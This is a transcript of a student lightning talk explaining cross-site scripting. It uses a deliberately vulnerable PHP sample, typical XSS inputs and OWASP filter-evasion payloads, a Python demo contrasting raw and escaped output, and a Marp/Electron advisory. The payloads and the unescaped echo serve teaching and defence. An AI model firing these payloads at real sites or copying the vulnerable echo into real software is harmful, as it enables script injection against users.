I looked into XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
B1 (first-year undergraduate). Twitter: @tmyk_kym. Blog: https://blog.koyama.me/. Interests: Network/Web/Server/Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting): untrusted input ends up in the generated HTML. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0).
Sample page (PHP):

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello, the generated page is:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script>, the generated page is:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><script>alert()</script></h1>
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS.
XSS == XSS
Typical XSS inputs:

    <script>alert(1)</script>
    "><script>alert(1)</script>
    " onmouseover="alert(1)
    x" onerror="alert(1)        <- img src
    javascript:alert(1)         <- a href
XSS
? / . XSS . XSS .
?
Source: OWASP XSS Filter Evasion Cheat Sheet (OWASP, 2015), Japanese translation hosted by JPCERT/CC: https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html. Three entries from it:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The slash after SCRIPT is accepted as a separator, so the browser parses it as:
    <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    The stray < characters do not stop the HTML parser from finding the script element; it ends up as:
    "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')>
    (The gaps in the transcript held HTML hexadecimal character references, &#x...;, splitting the words "javascript" and "alert".)
    The browser decodes the references and runs it as:
    <img src="x" onerror="javascript:alert('XSS')">
Other entries shown:

    <img src=javascript:alert('XSS')>
    <img src=javascript:alert(String.fromCharCode(88,83,83))>
    <META HTTP-EQUIV="refresh" CONTENT="3;URL=http://;URL=http://yahoo.co.jp/;">
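As an added example that is not part of the slides: the PHP sample above is rendered in Python with the same template, once echoed as-is and once through the equivalent of htmlspecialchars(..., ENT_QUOTES), and the inputs listed in this talk (the typical inputs and cheat-sheet entries [1] to [3]) are fed through both, with Python's tolerant html.parser standing in for the browser to show which inputs become elements. The character references in entry [3] are a constructed variant, since the slides elide the exact ones.

```python
import html
from html.parser import HTMLParser

# Same template as the PHP sample; {mode} is where $_GET['mode'] is echoed.
TEMPLATE = '<!doctype html><meta charset="utf-8"><title>XSS Sample</title><h1>{mode}</h1>'

# Inputs quoted in the talk. The last one is a constructed variant of cheat-sheet
# entry [3]: the slides only say it used &#x..; references, so 'c' and 'r' are
# written here as &#x63; and &#x72;.
PAYLOADS = [
    "<script>alert(1)</script>",
    '"><script>alert(1)</script>',
    '" onmouseover="alert(1)',          # only matters inside an attribute
    'x" onerror="alert(1)',             # only matters inside img src="..."
    "javascript:alert(1)",              # only matters inside a href="..."
    '<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>',
    '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    "<img src=x onerror=javas&#x63;ript:ale&#x72;t('XSS')>",
]

def render_vulnerable(mode):
    """<h1><?php echo $_GET['mode']; ?></h1>: the input is echoed unchanged."""
    return TEMPLATE.format(mode=mode)

def render_escaped(mode):
    """Equivalent of htmlspecialchars($mode, ENT_QUOTES, 'UTF-8'): & < > " ' escaped."""
    return TEMPLATE.format(mode=html.escape(mode, quote=True))

class H1Elements(HTMLParser):
    """Collects every element the tolerant parser finds inside <h1>."""
    def __init__(self):
        super().__init__()
        self.inside = 0
        self.found = []                 # [(tag, {attr: value}), ...]
    def handle_starttag(self, tag, attrs):
        if tag == "h1":
            self.inside += 1
        elif self.inside:
            self.found.append((tag, dict(attrs)))
    def handle_endtag(self, tag):
        if tag == "h1" and self.inside:
            self.inside -= 1

def elements_inside_h1(page):
    """Elements a browser-like parser would create from the untrusted part of page."""
    p = H1Elements()
    p.feed(page)
    p.close()
    return p.found
```

In the text context of the sample page, entries [1] to [3] and the first two typical inputs produce a script or img element from the raw echo (with the hex references in [3] decoded to javascript:alert('XSS')) and nothing from the escaped output. The quote-breaking and javascript: inputs create no element here because they target attribute and URL contexts, which is why the fix must also escape both quote characters (ENT_QUOTES).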
Electron and Marp: Marp is a Markdown slide editor built on Electron, a framework for building desktop apps with web technology. Entering <script>alert()</script> into a slide ... alert() is executed ...
?
JVN#21174546 (Marp, JavaScript): https://jvn.jp/jp/JVN21174546/
From "[Security issue] Remote script can read user local resource" (Issue #187, yhatt/marp): "However, sanitizing inline script should consider on future."
XSS XSS alert() Electron